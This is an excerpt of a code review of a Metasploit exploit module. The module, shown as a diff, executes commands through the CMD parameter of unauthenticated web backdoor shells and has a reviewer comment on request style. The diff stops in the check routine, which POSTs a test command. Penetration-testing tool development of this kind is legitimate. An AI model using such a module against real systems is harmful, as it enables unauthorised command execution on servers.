modules/exploits/multi/http/simple_backdoors_exec.rb

```diff
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Simple Backdoor Shell Remote Code Execution',
+      'Description'    => %q{
+          This module exploits unauthenticated simple web backdoor shells by leveraging the
+        common backdoor shells' CMD parameter  to execute commands. The SecLists project of
+        Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
+        which are categorized under Payloads.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Jay Turla <@shipcod3>',
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://resources.infosecinstitute.com/checking-out-backdoor-shells/' ],
+          [ 'URL', 'https://github.com/danielmiessler/SecLists/tree/master/Payloads' ] # Most PHP Web Backdoors Listed
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 2000,
+          'BadChars' => '',
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['backdoor / Unix', { 'Platform' => 'unix' } ],
+          ['backdoor / Windows', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => 'Sep 08 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "The path of a backdoor shell", "/cmd.php"]),
+      ],self.class)
+  end
+
+  def check
+    test = "echo me"
+    request_parameters = {
+      'method'	=> 'POST',
+      'uri'		=> normalize_uri(target_uri.path.to_s),
+      'vars_post'	=>
+        {
+          'cmd' => test
+        }
+    }
+    shell = send_request_cgi(request_parameters)
```

Comment:
You can send the parameters directly in the send_request_cgi call. This is the convention in the framework.